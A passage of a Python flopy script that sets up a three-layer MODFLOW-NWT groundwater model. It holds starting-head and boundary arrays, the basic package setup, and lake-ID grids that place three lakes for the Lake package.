210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0]
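# Stack the flat per-layer lists into 3-D (nlay, nrow, ncol) arrays that match
# the model grid; top1 (defined earlier) supplies the (nrow, ncol) shape.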
ibnd1 = np.array(ibnd1)
ibnd2 = np.array(ibnd2)
ibnd3 = np.array(ibnd3)
ibnd1 = ibnd1.reshape(top1.shape)
ibnd2 = ibnd2.reshape(top1.shape)
ibnd3 = ibnd3.reshape(top1.shape)
ibnd = [ibnd1, ibnd2, ibnd3]
ibnd = np.array(ibnd)
sthd1 = np.array(sthd1)
sthd1 = sthd1.reshape(top1.shape)
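# Layers 2 and 3 start from a uniform head of 210. (model length units)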
sthd2 = np.ones(top1.shape) * 210.
sthd3 = sthd2.copy()
sthd = [sthd1, sthd2, sthd3]
sthd = np.array(sthd)
hnoflo = -9999 # head assigned to inactive (IBOUND = 0) cells
bas = flopy.modflow.ModflowBas(mf, ibound=ibnd, hnoflo=hnoflo, strt=sthd)
## Instantiate Lake (LAK) package for MODFLOW-NWT
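# lkarr flags each cell with the ID of the lake occupying it
# (0 = aquifer cell; 1, 2, 3 = lakes 1 through 3).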
lkarr1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
lkarr2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
